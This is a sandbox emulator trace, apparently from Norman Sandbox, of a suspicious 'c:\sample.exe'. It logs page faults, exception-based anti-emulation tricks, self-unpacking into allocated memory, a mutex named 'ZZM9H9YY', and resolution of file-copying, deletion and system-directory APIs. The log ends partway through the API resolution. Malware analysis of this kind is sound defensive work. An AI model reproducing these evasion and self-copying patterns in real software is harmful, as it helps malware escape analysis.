Stripped RealMode Disk Operating System (DOS) 2.00
(C) Norman ASA 2001
Starting Windows kernel.
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003BB6 accessing page 0x00050001
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003BB6 accessing page 0x00050002
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003BB6 accessing page 0x00050003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003BB6 accessing page 0x00050004
Installing driver : "VMM ", DDB at 0x0xC00053D8
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031C00 accessing page 0x000C0006
Installing driver : "IFSMgr ", DDB at 0x0xC0005636
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031C00 accessing page 0x000C0007
Installing driver : "VWIN32 ", DDB at 0x0xC0006288
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031C00 accessing page 0x000C0008
Installing driver : "VFAT ", DDB at 0x0xC0007C4B
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031DF5 accessing page 0x00077BC0
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031E30 accessing page 0x00077BC1
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031E30 accessing page 0x00077BC2
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x77BC1113 accessing page 0x000F0001
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002BCC accessing page 0x000C3005
KERNEL32!WinExec ("C:\WINDOWS\SYSTEM32\KERNEL32.DLL",0x00031E9A)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003220 accessing page 0x00072001
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070000
PageFault tbl process 0x00000000 - 0x00000013 entries, 0x00000000-0x00000000. fhandle=0x720013C8.
|offset 0x7C800000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x7C801000, seek 0x00000600, size 0x00001000, flags=0x00000004
|offset 0x7C802000, seek 0x00001600, size 0x00001000, flags=0x00000004
|offset 0x7C803000, seek 0x00002600, size 0x00001000, flags=0x00000004
|offset 0x7C804000, seek 0x00003600, size 0x00001000, flags=0x00000004
|offset 0x7C805000, seek 0x00004600, size 0x00001000, flags=0x00000004
|offset 0x7C806000, seek 0x00005600, size 0x00001000, flags=0x00000004
|offset 0x7C807000, seek 0x00006600, size 0x00001000, flags=0x00000004
|offset 0x7C808000, seek 0x00007600, size 0x00001000, flags=0x00000004
|offset 0x7C809000, seek 0x00008600, size 0x00001000, flags=0x00000004
|offset 0x7C80A000, seek 0x00009600, size 0x00001000, flags=0x00000004
|offset 0x7C80B000, seek 0x0000A600, size 0x00001000, flags=0x00000004
|offset 0x7C80C000, seek 0x0000B600, size 0x00001000, flags=0x00000004
|offset 0x7C80D000, seek 0x0000C600, size 0x00000A00, flags=0x00000004
|offset 0x7C80E000, seek 0x0000D000, size 0x00001000, flags=0x00000000
|offset 0x7C80F000, seek 0x0000E000, size 0x00000400, flags=0x00000000
|offset 0x7C810000, seek 0x0000E400, size 0x00001000, flags=0x00000000
|offset 0x7C811000, seek 0x0000F400, size 0x00001000, flags=0x00000000
|offset 0x7C812000, seek 0x00010400, size 0x00000600, flags=0x00000008
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x77BC10D9 accessing page 0x0007C808
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C808E01 accessing page 0x0007C80E
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C8088DA accessing page 0x0007C800
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C8088EC accessing page 0x0007C810
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C808E1E accessing page 0x0007C80D
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C80D7C7 accessing page 0x0007C80F
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C80D7D1 accessing page 0x00073000
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C80D136 accessing page 0x0007C809
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003220 accessing page 0x00072002
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C808E2D accessing page 0x0007C803
KERNEL32!LoadLibraryA ("C:\WINDOWS\SYSTEM32\NTDLL.DLL")
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C8090D2 accessing page 0x0007C804
KERNEL32!GetModuleHandleA ("C:\WINDOWS\SYSTEM32\NTDLL.DLL")
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C80409A accessing page 0x0007C802
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\NTDLL.DLL",0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802954 accessing page 0x0007C801
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!_lclose (0x00000020)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\NTDLL.DLL",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070001
PageFault tbl process 0x00000000 - 0x00000004 entries, 0x00000000-0x00000000. fhandle=0x72001164.
|offset 0x7C900000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x7C901000, seek 0x00000600, size 0x00000A00, flags=0x00000000
|offset 0x7C902000, seek 0x00001000, size 0x00000200, flags=0x00000000
|offset 0x7C903000, seek 0x00001200, size 0x00000400, flags=0x00000008
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802FC4 accessing page 0x0007C80C
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802FEA accessing page 0x0007C900
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C803023 accessing page 0x0007C903
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C803416 accessing page 0x0007C901
KERNEL32!GetProcAddress (0x7C900000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!LoadLibraryA ("C:\WINDOWS\SYSTEM32\ADVAPI32.DLL")
KERNEL32!GetModuleHandleA ("C:\WINDOWS\SYSTEM32\ADVAPI32.DLL")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\ADVAPI32.DLL",0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!_lclose (0x00000020)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\ADVAPI32.DLL",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003220 accessing page 0x00072003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070002
PageFault tbl process 0x00000000 - 0x00000007 entries, 0x00000000-0x00000000. fhandle=0x720012AF.
|offset 0x77DC0000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x77DC1000, seek 0x00000600, size 0x00001000, flags=0x00000000
|offset 0x77DC2000, seek 0x00001600, size 0x00001000, flags=0x00000000
|offset 0x77DC3000, seek 0x00002600, size 0x00001000, flags=0x00000000
|offset 0x77DC4000, seek 0x00003600, size 0x00000400, flags=0x00000000
|offset 0x77DC5000, seek 0x00003A00, size 0x00000200, flags=0x00000000
|offset 0x77DC6000, seek 0x00003C00, size 0x00000E00, flags=0x00000008
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00077DC5
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"lstrcmp")
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802ECC accessing page 0x0007C811
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802ECC accessing page 0x0007C812
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802EF2 accessing page 0x0007C805
KERNEL32!GetProcAddress (0x7C800000,"lstrcpy")
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802EF2 accessing page 0x0007C807
KERNEL32!GetProcAddress (0x7C800000,"WinExec")
KERNEL32!GetProcAddress (0x7C800000,"ExpandEnvironmentStringsA")
KERNEL32!GetProcAddress (0x7C800000,"CreateSystemHandle")
KERNEL32!GetProcAddress (0x7C800000,"Sleep")
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!strcpy (0x04FFFB06,"C:\WINDOWS\SYSTEM32")
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C804051 accessing page 0x0007C806
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","user32.dll")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\user32.dll",0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!_lclose (0x00000020)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\user32.dll",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070003
PageFault tbl process 0x00000000 - 0x0000000B entries, 0x00000000-0x00000000. fhandle=0x72001364.
|offset 0x77D30000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x77D31000, seek 0x00000600, size 0x00001000, flags=0x00000000
|offset 0x77D32000, seek 0x00001600, size 0x00001000, flags=0x00000000
|offset 0x77D33000, seek 0x00002600, size 0x00001000, flags=0x00000000
|offset 0x77D34000, seek 0x00003600, size 0x00001000, flags=0x00000000
|offset 0x77D35000, seek 0x00004600, size 0x00001000, flags=0x00000000
|offset 0x77D36000, seek 0x00005600, size 0x00000A00, flags=0x00000000
|offset 0x77D37000, seek 0x00006000, size 0x00000C00, flags=0x00000000
|offset 0x77D38000, seek 0x00006C00, size 0x00000200, flags=0x00000000
|offset 0x77D39000, seek 0x00006E00, size 0x00001000, flags=0x00000000
|offset 0x77D3A000, seek 0x00007E00, size 0x00000800, flags=0x00000008
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00077D38
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"GetModuleHandleA")
KERNEL32!GetProcAddress (0x7C800000,"CreateHandle")
KERNEL32!GetProcAddress (0x7C800000,"ExitProcess")
KERNEL32!GetProcAddress (0x7C800000,"FindResourceA")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802FEA accessing page 0x00077D30
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C803023 accessing page 0x00077D39
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C803416 accessing page 0x00077D36
KERNEL32!GetProcAddress (0x77D30000,"CPlApplet")
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802ECC accessing page 0x00077D3A
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802FEA accessing page 0x00077DC0
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C803023 accessing page 0x00077DC6
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C803416 accessing page 0x00077DC3
KERNEL32!GetProcAddress (0x77DC0000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!LoadLibraryA ("C:\WINDOWS\SYSTEM32\GDI32.DLL")
KERNEL32!GetModuleHandleA ("C:\WINDOWS\SYSTEM32\GDI32.DLL")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\GDI32.DLL",0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!_lclose (0x00000020)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\GDI32.DLL",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070004
PageFault tbl process 0x00000000 - 0x00000005 entries, 0x00000000-0x00000000. fhandle=0x72002BA8.
|offset 0x77F10000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x77F11000, seek 0x00000600, size 0x00001000, flags=0x00000000
|offset 0x77F12000, seek 0x00001600, size 0x00000A00, flags=0x00000000
|offset 0x77F13000, seek 0x00002000, size 0x00000200, flags=0x00000000
|offset 0x77F14000, seek 0x00002200, size 0x00000A00, flags=0x00000008
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C802FEA accessing page 0x00077F10
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C803023 accessing page 0x00077F14
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C803416 accessing page 0x00077F12
KERNEL32!GetProcAddress (0x77F10000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!LoadLibraryA ("C:\WINDOWS\SYSTEM32\USER32.DLL")
KERNEL32!GetModuleHandleA ("C:\WINDOWS\SYSTEM32\USER32.DLL")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!SetCurrentDirectory ("C:\WINDOWS")
KERNEL32!WinExec ("c:\sample.exe",0x00000000)
KERNEL32!InternalExec ("c:\sample.exe",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070005
PageFault tbl process 0x00000100 - 0x0000001A entries, 0x00000000-0x00000000. fhandle=0x7200301F.
|offset 0x00400000, seek 0x00000000, size 0x00001000, flags=0x00000004
|offset 0x00401000, seek 0x00001000, size 0x00001000, flags=0x00000000
|offset 0x00402000, seek 0x00002000, size 0x00001000, flags=0x00000000
|offset 0x00403000, seek 0x00003000, size 0x00001000, flags=0x00000000
|offset 0x00404000, seek 0x00004000, size 0x00001000, flags=0x00000000
|offset 0x00405000, seek 0x00005000, size 0x00000600, flags=0x00000000
|offset 0x00406000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00407000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00408000, seek 0x00005600, size 0x00000800, flags=0x00000000
|offset 0x00409000, seek 0x00005E00, size 0x00000600, flags=0x00000000
|offset 0x0040A000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040B000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040C000, seek 0x00006400, size 0x00000400, flags=0x00000000
|offset 0x0040D000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040E000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040F000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00410000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00411000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00412000, seek 0x00006800, size 0x00001000, flags=0x00000000
|offset 0x00413000, seek 0x00007800, size 0x00001000, flags=0x00000000
|offset 0x00414000, seek 0x00008800, size 0x00001000, flags=0x00000000
|offset 0x00415000, seek 0x00009800, size 0x00001000, flags=0x00000000
|offset 0x00416000, seek 0x0000A800, size 0x00001000, flags=0x00000000
|offset 0x00417000, seek 0x0000B800, size 0x00001000, flags=0x00000000
|offset 0x00418000, seek 0x0000C800, size 0x00001000, flags=0x00000000
|offset 0x00419000, seek 0x0000D800, size 0x00000C00, flags=0x00000008
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00000413
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"GetModuleHandleA")
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!GetProcAddress (0x77D30000,"MessageBoxA")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x00000400
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803023 accessing page 0x00000419
KERNEL32!CreateThread (0x00000000,0x00000000,0x00413BD6,0x7C8010C3,0x00000000,0x04FFFE16)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FFD0
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072004
KERNEL32!LeaveCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0007490 accessing page 0x00000412
KERNEL32!LeaveCriticalSection (0x00000000)
**EXCEPTION: opcode 0xF1F7 SEH=0x004139F3 FaultCode=0xC0000094 EFlags=0x00000244
==>cs:eip 0x002B:0x00413A01 eax=0x00000A01 ebx=0x00000000 ecx=0x00000000 edx=0x0041202E esi=0x00413992 edi=0x7200440F esp=0x4FFD0B9C ebp=0x4FFD0BF8
**EXCEPTION: opcode 0xF873 SEH=0x00413A23 FaultCode=0x80000004 EFlags=0x00000300
==>cs:eip 0x002B:0x00413A3E eax=0x4FFD0B08 ebx=0x004139F3 ecx=0x004139F3 edx=0x0041202E esi=0x72003DA7 edi=0x00000000 esp=0x4FFD0B7C ebp=0x4FFD0B68
**EXCEPTION: opcode 0xCC90 SEH=0x004120C5 FaultCode=0x80000003 EFlags=0x00000244
==>cs:eip 0x002B:0x0041208C eax=0x00000000 ebx=0x00412069 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
<==cs:eip 0x002B:0x0041208D eax=0x00000000 ebx=0x00412069 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
**EXCEPTION: opcode 0xF990 SEH=0x004120C5 FaultCode=0x80000004 EFlags=0x00000301
==>cs:eip 0x002B:0x00412090 eax=0x00000000 ebx=0x00412069 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
<==cs:eip 0x002B:0x00412091 eax=0x00000000 ebx=0x00412069 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
**EXCEPTION: opcode 0xF890 SEH=0x004120C5 FaultCode=0x80000004 EFlags=0x00000300
==>cs:eip 0x002B:0x00412099 eax=0x00825306 ebx=0x00412069 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
<==cs:eip 0x002B:0x0041209A eax=0x00825306 ebx=0x00412069 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
**EXCEPTION: opcode 0xFC90 SEH=0x004120C5 FaultCode=0x80000004 EFlags=0x00000304
==>cs:eip 0x002B:0x0041209E eax=0x00825306 ebx=0x00020903 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
<==cs:eip 0x002B:0x0041209F eax=0x00825306 ebx=0x00020903 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
**EXCEPTION: opcode 0x9090 SEH=0x004120C5 FaultCode=0x80000004 EFlags=0x00000300
==>cs:eip 0x002B:0x004120A3 eax=0x41298300 ebx=0x00020903 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
<==cs:eip 0x002B:0x004120A4 eax=0x41298300 ebx=0x00020903 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
**EXCEPTION: opcode 0xF7F3 SEH=0x004120C5 FaultCode=0xC0000094 EFlags=0x00000244
==>cs:eip 0x002B:0x004120A7 eax=0x41298300 ebx=0x00000000 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
<==cs:eip 0x002B:0x004120A9 eax=0x41298300 ebx=0x00000000 ecx=0x00000000 edx=0x00412069 esi=0x00412886 edi=0x00412886 esp=0x4FFD0BC4 ebp=0x0041207F
**EXCEPTION: opcode 0x8DC0 SEH=0x0041268A FaultCode=0xC0000094 EFlags=0x00000244
==>cs:eip 0x002B:0x004126A8 eax=0x00010006 ebx=0x7C810E06 ecx=0x00000000 edx=0x0000065F esi=0x00413992 edi=0x00413992 esp=0x4FFD0BA4 ebp=0x0041207F
KERNEL32!GetModuleFileNameA (0x00400000,0x00412000,0x00000104)
KERNEL32!CreateFileA ("c:\sample.exe",0x80000000,0x00000001,0x00000000,0x00000003,0x00000080,0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!ReadFile (0x00000020,0x00412008,0x00000400,0x00412000,0x00000000)
KERNEL32!HeapAlloc (0x00000000,0x00000000,0x00001010)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073001
KERNEL32!CloseHandle (0x00000020)
KERNEL32!HeapFree (0x00000000,0x00000000,0x73000FBC)
**EXCEPTION: opcode 0x66F7 SEH=0x00412A90 FaultCode=0xC0000094 EFlags=0x00000244
==>cs:eip 0x002B:0x00412AA1 eax=0x00000000 ebx=0x00000000 ecx=0x00000000 edx=0x79DCB8A4 esi=0x7C8020DA edi=0x00413DA0 esp=0x4FFD0BC0 ebp=0x0041207F
**EXCEPTION: opcode 0xEB01 SEH=0x00412AC2 FaultCode=0x80000004 EFlags=0x00000344
==>cs:eip 0x002B:0x00412AE1 eax=0x00412AC2 ebx=0x00000000 ecx=0x00412A90 edx=0x79DCB8A4 esi=0x72004B53 edi=0x00000000 esp=0x4FFD0BC0 ebp=0x0041207F
**EXCEPTION: opcode 0xCC90 SEH=0x00412B03 FaultCode=0x80000003 EFlags=0x00000244
==>cs:eip 0x002B:0x00412B27 eax=0x00000000 ebx=0x00000000 ecx=0x00412AC2 edx=0x79DCB8A4 esi=0x72004C43 edi=0x00000000 esp=0x4FFD0BC0 ebp=0x0041207F
**EXCEPTION: opcode 0xF7F3 SEH=0x00412B41 FaultCode=0xC0000094 EFlags=0x00000244
==>cs:eip 0x002B:0x00412B67 eax=0x88234772 ebx=0x00000000 ecx=0x00412B03 edx=0x00000000 esi=0x72004D33 edi=0x00000000 esp=0x4FFD0BC0 ebp=0x0041207F
**EXCEPTION: opcode 0xCC90 SEH=0x00412BC4 FaultCode=0x80000003 EFlags=0x00000244
==>cs:eip 0x002B:0x00412BF0 eax=0x00000000 ebx=0x00000000 ecx=0x00412B41 edx=0x00000000 esi=0x72004647 edi=0x00004A4D esp=0x4FFD0BC0 ebp=0x0041207F
KERNEL32!CreateMutexA (0x00000000,0x00000001,"ZZM9H9YY")
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072005
**EXCEPTION: opcode 0xF1F7 SEH=0x00412E03 FaultCode=0xC0000094 EFlags=0x00000244
==>cs:eip 0x002B:0x00412E11 eax=0xD4472EC3 ebx=0x00000000 ecx=0x00000000 edx=0x00000000 esi=0x00412C6B edi=0x00412C83 esp=0x4FFD0BA0 ebp=0x0000695E
**EXCEPTION: opcode 0xF873 SEH=0x00412E31 FaultCode=0x80000004 EFlags=0x00000344
==>cs:eip 0x002B:0x00412E4C eax=0x00000A00 ebx=0x00000000 ecx=0x00412E03 edx=0x00000000 esi=0x7200504B edi=0x00412E03 esp=0x4FFD0B80 ebp=0x4FFD0B6C
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00412D42 accessing page 0x00000401
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00412D42 accessing page 0x00000402
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00412D42 accessing page 0x00000403
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00412D42 accessing page 0x00000404
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00412D42 accessing page 0x00000405
KERNEL32!VirtualAlloc (0x00000000,0x00004610,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000005 entries, 0x00000000-0x00000000. fhandle=0xFFFFFFFF.
|offset 0x20000000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20001000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20002000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20003000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20004000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x00020000
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x00020001
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x00020002
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x00020003
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x00020004
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413128 accessing page 0x00000406
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413128 accessing page 0x00000407
KERNEL32!VirtualFree (0x20000000,0x00004610,0x00004000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00412D42 accessing page 0x00000408
KERNEL32!VirtualAlloc (0x00000000,0x00000810,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000001 entries, 0x00000000-0x00000000. fhandle=0xFFFFFFFF.
|offset 0x20010000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x00020010
KERNEL32!VirtualFree (0x20010000,0x00000810,0x00004000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00412D42 accessing page 0x00000409
KERNEL32!VirtualAlloc (0x00000000,0x00000610,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000001 entries, 0x00000000-0x5608E620. fhandle=0xFFFFFFFF.
|offset 0x20020000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x00020020
KERNEL32!VirtualFree (0x20020000,0x00000610,0x00004000)
KERNEL32!GetModuleHandleA ("KERNEL32.dll")
KERNEL32!VirtualAlloc (0x00000000,0x00000D35,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000001 entries, 0x00000000-0x00000000. fhandle=0xFFFFFFFF.
|offset 0x20030000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413460 accessing page 0x00020030
KERNEL32!GetProcAddress (0x7C800000,"CopyFileA")
KERNEL32!GetProcAddress (0x7C800000,"DeleteFileA")
KERNEL32!GetProcAddress (0x7C800000,"GetSystemDirectoryA")
KERNEL32!GetProcAddress (0x7C800000,"GetModuleFileNameA")
KERNEL32!GetProcAddress (0x7C800000,"GetComputerNameA")
KERNEL32!GetProcAddress (0x7C800000,"Sleep")
KERNEL32!GetProcAddress (0x7C800000,"GetModuleHandleA")
KERNEL32!GetProcAddress (0x7C800000,"SetEnvironmentVariableA")
KERNEL32!GetProcAddress (0x7C800000,"SetFileAttributesA")
KERNEL32!GetProcAddress (0x7C800000,"CompareStringA")
KERNEL32!GetProcAddress (0x7C800000,"FlushFileBuffers")
KERNEL32!GetProcAddress (0x7C800000,"LCMapStringW")
KERNEL32!GetProcAddress (0x7C800000,"ReleaseMutex")
KERNEL32!GetProcAddress (0x7C800000,"CloseHandle")
KERNEL32!GetProcAddress (0x7C800000,"CreateMutexA")
KERNEL32!GetProcAddress (0x7C800000,"CompareStringW")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x0007C80B
KERNEL32!GetProcAddress (0x7C800000,"GetLastError")
KERNEL32!GetProcAddress (0x7C800000,"LCMapStringA")
KERNEL32!GetProcAddress (0x7C800000,"SetStdHandle")
KERNEL32!GetProcAddress (0x7C800000,"LoadLibraryA")
KERNEL32!GetProcAddress (0x7C800000,"GetProcAddress")
KERNEL32!GetProcAddress (0x7C800000,"GetOEMCP")
KERNEL32!GetProcAddress (0x7C800000,"GetACP")
KERNEL32!GetProcAddress (0x7C800000,"GetCPInfo")
KERNEL32!GetProcAddress (0x7C800000,"InterlockedIncrement")
KERNEL32!GetProcAddress (0x7C800000,"InterlockedDecrement")
KERNEL32!GetProcAddress (0x7C800000,"SetFilePointer")
KERNEL32!GetProcAddress (0x7C800000,"WriteFile")
